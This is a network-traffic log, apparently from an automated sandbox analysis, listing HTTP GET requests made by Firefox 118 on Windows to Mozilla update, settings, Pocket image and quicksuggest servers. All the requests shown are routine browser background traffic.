Source: global traffic HTTP traffic detected: GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2Fb1da8a8e-07d7-4788-a750-b444d5b94049.jpeg HTTP/1.1Host: img-getpocket.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: image/avif,image/webp,*/*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brOrigin: nullConnection: keep-aliveSec-Fetch-Dest: imageSec-Fetch-Mode: corsSec-Fetch-Site: cross-site
Source: global traffic HTTP traffic detected: GET /update/3/SystemAddons/118.0.1/20230927232528/WINNT_x86_64-msvc-x64/en-US/release/Windows_NT%252010.0.0.0.19045.2006%2520(x64)/default/default/update.xml HTTP/1.1Host: aus5.mozilla.orgUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /update/3/GMP/118.0.1/20230927232528/WINNT_x86_64-msvc-x64/en-US/release/Windows_NT%252010.0.0.0.19045.2006%2520(x64)/default/default/update.xml HTTP/1.1Host: aus5.mozilla.orgUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /v1/buckets/main/collections/nimbus-desktop-experiments/changeset?_expected=1721935300722&_since=%221696422861896%22 HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: application/jsonAccept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brContent-Type: application/jsonConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /v1/ HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /chains/202402/aus.content-signature.mozilla.org-2024-09-02-22-40-36.chain HTTP/1.1Host: content-signature-2.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /main-workspace/quicksuggest/32706371-5612-48cb-8cf8-6a1c97906e3c HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /main-workspace/quicksuggest/bea0c2fe-9c8c-4351-9ede-4051baa1ed47.json HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /main-workspace/quicksuggest/8e264f27-207e-4cfd-84c9-8ea2fce78243 HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /main-workspace/quicksuggest/20f6c216-2267-4b1e-af58-22d224043fe9 HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /main-workspace/quicksuggest/4390d749-61a9-4b7a-ac8f-88a2a8145c59 HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /main-workspace/quicksuggest/5e1b56db-af05-453a-83ac-7c094f25918d HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /main-workspace/quicksuggest/3012260d-8f8d-4863-9be6-03970e37af68 HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /main-workspace/quicksuggest/dff96728-c23d-4f24-91c7-9233d01352d4 HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /main-workspace/quicksuggest/7b0c093e-1c31-409b-a323-78ca82e5f600 HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /main-workspace/quicksuggest/25043d3b-9aeb-4f57-a7da-874ab81697bd HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /main-workspace/quicksuggest/a960129b-64a7-439d-a8e6-f8d201e0b44e HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /main-workspace/quicksuggest/437e6fa9-e584-4be9-8a1f-e4951809fd17 HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /main-workspace/quicksuggest/118946fc-cb7b-4340-a9e0-a565a5c8876b HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /main-workspace/quicksuggest/05f7ba7a-f7cf-4288-a89f-8fad6970a3b8 HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /main-workspace/quicksuggest/f11c1bba-0d2e-44d8-acb1-e375719dd8b8 HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /main-workspace/quicksuggest/d9c6e436-11b1-4ae1-8d6f-e109d59d5069 HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /main-workspace/quicksuggest/41a4b1d8-9773-4011-ab45-8d749a67cebd HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /main-workspace/quicksuggest/16ab4d01-9f0c-4fb9-bc87-cfcbe230a838 HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /main-workspace/quicksuggest/ae974b57-6287-44fb-a8d4-9c2ba83914fc HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /main-workspace/quicksuggest/0fadd772-b5da-4b3f-9153-9ed8d41930f7 HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /main-workspace/quicksuggest/661cc2b3-833b-4044-a93a-a208f3d6fd1c HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /main-workspace/quicksuggest/bfaa2e89-f7e3-478e-b83d-3bf27fc2c00f HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /main-workspace/quicksuggest/d6977194-0ec3-4aef-b861-5cb96278213d HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /main-workspace/quicksuggest/d7f071e9-d3de-4df6-9079-ca2e3ecddc08 HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /main-workspace/quicksuggest/c8ad0165-121f-4bc8-bdd1-a2822cb41726 HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /main-workspace/quicksuggest/d31608f2-3b9f-449e-ab6f-bfa39d6e5b7e HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /main-workspace/quicksuggest/9532c448-e8d8-4f5d-9c67-0f0eba020af8 HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /main-workspace/quicksuggest/d2b0ec78-51ee-4da9-9eda-88c3d4ff820a HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /main-workspace/quicksuggest/2ac3379b-3190-40b9-b9a2-a824fcea8c53 HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /main-workspace/quicksuggest/d03657b0-717f-46ce-ac76-f69d851cb204 HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /main-workspace/quicksuggest/97c48ac8-6851-4bb9-8fd8-0ec4ff6093f9 HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /main-workspace/quicksuggest/67ed17cc-443d-441a-8fed-df75291d73f0 HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /main-workspace/quicksuggest/b21f3c4f-4dd2-4fe0-8357-c6298a3a05da HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /main-workspace/quicksuggest/26507d2d-8c51-42b6-b2fe-2028454d4651 HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /main-workspace/quicksuggest/d4e275ab-c7a1-4d16-9407-d03d849b8e21 HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /main-workspace/quicksuggest/7cc0fd66-fa48-46f1-9a0e-537764d9a4da HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /main-workspace/quicksuggest/e9c18a75-e614-4528-aa5b-083cbfe4f6f9 HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /main-workspace/quicksuggest/fe7b59a0-3469-46d2-a0a9-f7002bf0d746 HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /main-workspace/quicksuggest/05965656-d778-4160-87a2-82189597bec4 HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /main-workspace/quicksuggest/f5c2d820-dcad-4846-b0d5-4e73dfe3fb89 HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /main-workspace/quicksuggest/021a8f00-3de7-4da0-a723-1e308f3de9f9 HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /main-workspace/quicksuggest/4e4ea300-9fea-4246-94b1-f3edfe89afb8 HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /main-workspace/quicksuggest/d7131cfd-b567-49d1-8f01-69df01534e13 HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /main-workspace/quicksuggest/2799ba3f-afb9-458a-b1c4-fad5281a924f HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /main-workspace/quicksuggest/b3dbd278-2094-48b0-a46a-81e3510b5463 HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /main-workspace/quicksuggest/64ae626e-5ef5-4753-80c5-8e21185f87fd HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /v1/ HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /v1/ HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /main-workspace/quicksuggest/189d4073-cca2-4df0-a7b5-9d16bbea3530 HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /v1/ HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /main-workspace/quicksuggest/8eb28f23-93ae-4186-87e6-0dfb5f0b1680 HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /v1/ HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /v1/ HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /v1/ HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /main-workspace/quicksuggest/d940c3cc-b54d-46ec-ba62-cd986567e930 HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /main-workspace/quicksuggest/aa9a9e98-a819-4fe9-8780-fe2740740109 HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /main-workspace/quicksuggest/bb671625-edff-45f6-aa62-003dc3afbbbc HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /v1/ HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /v1/ HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /main-workspace/quicksuggest/0386bbdc-6ab6-4665-8e19-05f505e7088f HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /main-workspace/quicksuggest/dfea7ddb-648f-4b1c-a906-c9899851d559 HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /v1/ HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /main-workspace/quicksuggest/953ce342-0dba-4d8c-b84d-300c8b1df4ac HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /v1/ HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /v1/ HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /v1/ HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /main-workspace/quicksuggest/91ef2bf1-a36b-48dd-914e-195981ce7ea7 HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /main-workspace/quicksuggest/ddb01327-71d3-427b-8f25-2666ca1019bf HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /v1/ HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
